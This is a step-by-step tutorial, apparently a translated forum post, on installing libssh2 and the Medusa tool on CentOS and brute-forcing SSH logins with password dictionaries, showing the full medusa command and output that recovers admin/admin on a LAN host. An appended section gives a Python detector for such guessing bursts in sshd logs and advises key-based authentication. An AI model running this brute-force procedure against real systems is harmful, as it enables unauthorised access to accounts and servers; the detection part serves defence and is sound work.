1. Software
   OS: CentOS release 5.2 (Final) (check with cat /etc/issue)
   Library: libssh2-1.2.7.tar.gz
       http://www.libssh2.org/download/libssh2-1.2.6.tar.gz
   medusa: medusa-2.0.tar.gz
       wget http://www.foofus.net/jmk/tools/medusa-2.0.tar.gz
   or
       curl -O http://www.foofus.net/jmk/tools/medusa-2.0.tar.gz

2. Install libssh2-1.2.7
   Copy libssh2-1.2.7.tar.gz to /tmp/, extract it to libssh2-1.2.7 and change into that directory:
   2.1 ./configure
   2.2 make
   2.3 make install

3. Install medusa-2.0
   Copy medusa-2.0.tar.gz to /tmp/, extract it to medusa-2.0 and change into that directory:
   3.1 ./configure --build="i686-pc-linux" --enable-module-ssh=yes
   3.2 make
   3.3 make install

4. Set the LD_LIBRARY_PATH environment variable so that medusa can find the required shared library when cracking SSH
       export LD_LIBRARY_PATH=/usr/local/lib
   NOTE: If an error like the following appears at run time, the setting above usually resolves it:
       IMPORTANT: Couldn't load "ssh" [libssh2.so.1: cannot open shared object file: No such file or directory].

5. Start cracking SSH
   Copy the dictionaries (e.g. brute.dic, p.dic) to /tmp/, change into /tmp/ and type medusa to see its help output; with that information you can start cracking SSH. E.g. (assuming the target IP is 192.168.10.126):

[root@CentOS2 tmp]# medusa -h 192.168.10.126 -U brute.dic -P p.dic -t 7 -f -r 10 -M ssh
Medusa v2.0 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>
ACCOUNT CHECK: [ssh] Host: 192.168.10.126 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: adidas (123 of 4086 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.10.126 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: admin (124 of 4086 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.10.126 User: admin Password: admin [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.10.126 (1 of 1, 0 complete) User: admin (1 of 1, 1 complete) Password: access (125 of 4086 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.10.126 (1 of 1, 0 complete) User: admin (1 of 1, 1 complete) Password: accident (126 of 4086 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.10.126 (1 of 1, 0 complete) User: admin (1 of 1, 1 complete) Password: across (127 of 4086 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.10.126 (1 of 1, 0 complete) User: admin (1 of 1, 1 complete) Password: adam (128 of 4086 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.10.126 (1 of 1, 0 complete) User: admin (1 of 1, 1 complete) Password: admin (129 of 4086 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.10.126 User: admin Password: admin [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.10.126 (1 of 1, 0 complete) User: admin (1 of 1, 2 complete) Password: Admin (130 of 4086 complete)

When "ACCOUNT FOUND" appears, the crack has succeeded; in the example above the cracked username is admin and the password is admin.
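On the target host, a run like the one above shows up in the sshd log as a rapid series of failed password logins from one source, followed by a success. The following is an added example (not part of the original post) that detects this pattern; the log lines, the source addresses 192.168.10.50 and 192.168.10.77, and the threshold and window values are constructed assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Matches OpenSSH password-auth results as written to /var/log/secure on CentOS.
LINE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\S+) port \d+"
)

def detect_guessing(lines, threshold=5, window=timedelta(seconds=60), year=2024):
    """Alert on sources with >= threshold failures inside window, and record
    the first account that later logs in by password from the same source."""
    failures = defaultdict(list)  # ip -> timestamps of failures still in window
    tried = defaultdict(set)      # ip -> usernames seen in failed attempts
    alerts = {}                   # ip -> alert record
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        # Syslog timestamps carry no year, so the caller supplies one.
        ts = datetime.strptime(str(year) + " " + m.group("ts"), "%Y %b %d %H:%M:%S")
        ip, user = m.group("ip"), m.group("user")
        if m.group("result") == "Failed":
            tried[ip].add(user)
            recent = [t for t in failures[ip] if ts - t <= window] + [ts]
            failures[ip] = recent
            if len(recent) >= threshold and ip not in alerts:
                alerts[ip] = {"ip": ip, "first_seen": recent[0],
                              "users": tried[ip], "compromised": None}
        elif ip in alerts and alerts[ip]["compromised"] is None:
            # Success after a burst of failures: treat the password as guessed.
            alerts[ip]["compromised"] = user
    return list(alerts.values())

# Constructed sample: seven failures in seven seconds, then a success,
# plus one unrelated failure from another address that must not alert.
SAMPLE = [f"Jul 19 15:41:{30 + i:02d} CentOS2 sshd[{4100 + i}]: Failed password "
          f"for admin from 192.168.10.50 port {51000 + i} ssh2" for i in range(7)]
SAMPLE.append("Jul 19 15:41:38 CentOS2 sshd[4108]: Accepted password "
              "for admin from 192.168.10.50 port 51008 ssh2")
SAMPLE.append("Jul 19 15:42:10 CentOS2 sshd[4120]: Failed password "
              "for invalid user bob from 192.168.10.77 port 40022 ssh2")

if __name__ == "__main__":
    for a in detect_guessing(SAMPLE):
        print(a["ip"], sorted(a["users"]), "compromised:", a["compromised"])
```

An alert whose "compromised" field is set means the account's password should be rotated and its sessions reviewed; disabling password authentication in favour of keys removes this attack path.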
Remote SSH cracking on Linux